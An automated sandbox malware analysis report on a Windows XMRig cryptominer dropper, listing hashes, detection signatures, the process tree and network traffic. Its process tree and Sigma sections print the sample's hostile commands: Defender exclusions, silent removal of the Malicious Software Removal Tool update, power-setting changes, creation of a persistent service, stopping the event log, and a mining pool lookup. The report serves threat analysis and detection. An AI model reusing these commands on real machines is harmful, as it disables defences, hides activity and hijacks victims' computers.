Edit tour

Windows Analysis Report
gq83mrprwy.exe

Overview

General Information

Sample name:	gq83mrprwy.exe renamed because original name is a hash value
Original sample name:	3b43da1be0c39802b78f6b2c55c4d7e6.exe
Analysis ID:	1432188
MD5:	3b43da1be0c39802b78f6b2c55c4d7e6
SHA1:	c7735b309f6543439e447def8351d7238f7c9d58
SHA256:	00f5cb420d8caf253b67e22714104ce1fb2d75341286c6e3ff31f527e7e5f5eb
Tags:	64CoinMinerexetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

System process connects to network (likely due to code injection or exploit)

Yara detected Xmrig cryptocurrency miner

Adds a directory exclusion to Windows Defender

DNS related to crypt mining pools

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gq83mrprwy.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\gq83mrprwy.exe" MD5: 3B43DA1BE0C39802B78F6B2C55C4D7E6)

powershell.exe (PID: 7392 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8240 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 8488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

powercfg.exe (PID: 8256 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 8264 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 8272 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 8288 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 8332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8304 cmdline: C:\Windows\system32\sc.exe delete "CENLNOGJ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8504 cmdline: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8588 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8596 cmdline: C:\Windows\system32\sc.exe start "CENLNOGJ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

svchost.exe (PID: 7744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

vefyedjsvjut.exe (PID: 8668 cmdline: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe MD5: 3B43DA1BE0C39802B78F6B2C55C4D7E6)

powershell.exe (PID: 8680 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 9104 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

powercfg.exe (PID: 9112 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 9152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 9120 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 9136 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 9184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 9144 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4488 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000002C.00000002.4196308144.00000000014DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.3173090923.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.3172825597.00000000122A6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.2566481602.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000003.2566319843.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 4488	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 7 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8256, ProcessName: powercfg.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7392, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CENLNOGJ" binpath= "C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe" start= "auto", ProcessId: 8504, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7392, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7744, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gq83mrprwy.exe", ParentImage: C:\Users\user\Desktop\gq83mrprwy.exe, ParentProcessId: 7380, ParentProcessName: gq83mrprwy.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8588, ProcessName: sc.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	ReversingLabs: Detection: 63%
Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe	Virustotal: Detection: 58%			Perma Link

Multi AV Scanner detection for submitted file

Source: gq83mrprwy.exe	ReversingLabs: Detection: 63%
Source: gq83mrprwy.exe	Virustotal: Detection: 55%			Perma Link

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000002C.00000002.4196308144.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3173090923.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3172825597.00000000122A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.2566481602.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.2002158674.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.2566319843.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4488, type: MEMORYSTR

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: gq83mrprwy.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vefyedjsvjut.exe, 0000001C.00000003.1948571755.00000204887F0000.00000004.00000001.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 51.15.65.182 10343	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 145.14.144.16 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 145.14.144.253 443	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.4:49752 -> 51.15.65.182:10343

Source: Joe Sandbox View	IP Address: 51.15.65.182 51.15.65.182
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: AWEXUS AWEXUS
Source: Joe Sandbox View	ASN Name: AWEXUS AWEXUS

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-14; NID=513=LZiA5-OikT2FARfJHTlz7GmAJ_1c58E7iPXPG6eGJ089a77Y0-A6KUT0uJExUp812F0MCRYzKz_xF1rCjduqg4NLus6wsGOVnnSv99SY6w8HBLrl6kYAnOlOD2IyKmr4tWFD8dUTUmc2UGqjfkQzh17sbjitF35JGlyVZqViFFg
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
